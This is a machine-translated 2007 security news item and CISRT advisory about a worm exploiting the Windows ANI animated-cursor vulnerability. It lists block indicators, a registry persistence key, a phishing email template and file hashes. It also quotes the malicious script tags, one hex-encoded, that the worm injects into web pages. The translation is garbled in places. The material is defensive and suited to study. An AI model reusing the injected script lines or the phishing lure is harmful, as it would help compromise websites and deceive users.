Cursor vulnerability complex worm appears Vista OS exposes first photocopy a major loophole _it industry

Source: Internet
Author: User
Compound worm with cursor vulnerability exposed first photocopy a major flaw in Vista OS

March 30, Microsoft Vista operating system exposure first photocopy a major loophole. Yesterday, rising anti-virus experts found that the vulnerability has begun to be exploited by hackers, using Windows Vista and XP users, access to the poison site will be Sunway virus, theft Trojan Horse (Trojan killing software download) and many other viral infections. According to monitoring, there are nearly 10 sites in the country have been hacked.

Earlier, Microsoft had issued a warning that attackers were actively exploiting an ANI vulnerability in the Windows animated cursor (.) file. This vulnerability will affect Windows XP above operating systems and browsers above IE6, and Microsoft's newest Vista and IE7 are not spared. Microsoft has not yet released a patch for this vulnerability.

According to the rising security experts, ANI files are Windows mouse dynamic cursor files, because Vista and other systems in the processing of ANI files in the way there are loopholes, hackers can construct a special form of ANI files, when users browse the Web page containing the file, Or click on the file will automatically download the running hacker designated virus, Trojan and backdoor procedures and so on. Sunway (worm.viking) variants and Trojan viruses that steal online games are the majority of viruses that exploit this vulnerability.

This is the first time the Vista system exposed a major loophole, the number of sites that use this vulnerability to spread viruses is increasing, and the attack code is likely to be exposed.

Security experts remind ordinary netizens not to easily landing unfamiliar websites, especially through e-mail, chat software sent to the unfamiliar web site. Site administrators, should strengthen their own server log management, in particular, to pay attention to the unknown source of ANI and JPG format picture files, as soon as the abnormal processing.

------------------c.i.s.r.t. Information------------------

A very bad news to tell you that the use of Microsoft Animation Cursor vulnerability of the new worm has appeared. We have received the relevant samples, through analysis, we have confirmed that this is a complex worm that contains features like panda incense infection, the ability to download other viruses, the ability to send messages containing the latest, ANI vulnerabilities, HTML and other files, and add the latest vulnerabilities to these files. Because the risk is very high, CISRT Lab decided to release the moderate risk warning again, to remind the majority of netizens to increase vigilance!

At the same time we recommend the vast number of netizens, enterprise network management to the following two domain names and IP shielding:

2007ip.com
Microfsot.com
61.153.247.76


The worm is about 13K in size, releasing files to the following directory:

%system%\sysload3.exe


Add registry key value:

Hkcu\software\microsoft\windows\currentversion\run
"System Boot Check" = "%system%\sysload3.exe"


will send the message:

From:i_lov E_cq@sohu. Com
Subject: Who were you filmed with the video? I'll give you a laugh!
Body:
Look at your demo! I think you are famous!
You see this address! Your face is so clear! You've become a star!
HTTP://MACR.MICR of Sot.com/<remove d>/134952.htm


Infection. Html. ASPX. Htm. Php. Jsp. ASP and. EXE file, and to. Html. ASPX. Htm. Php. Jsp. The following code is implanted in the ASP file:

<script src=http://macr.microfsot.com/<removed>.js></script>
Or
<script language= "javascript" src= "http://%6D%6 1%63%72%2e%6d%69%63%72%6f%66%73%6f%74%2e%63%6f%6d/<removed >.js "></script>


Note that the URL mentioned in the email and Web page contains a malicious file with the. ANI 0-day vulnerability.

Kaspersky Detection for Trojan-downloader.win32.agent.bky, poison tyrants named Worm.myinfect

At present, we receive a sample MD5 value of

99720c731d19512678d9594867024e7e
4ebca8337797302fc6003eb50dd6237d
e9100ce97a5b4fbd8857b25ffe2d7179


2007.3.31 22:45 for the first time update:

The author expressed his dissatisfaction with Kaspersky in the worm.

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.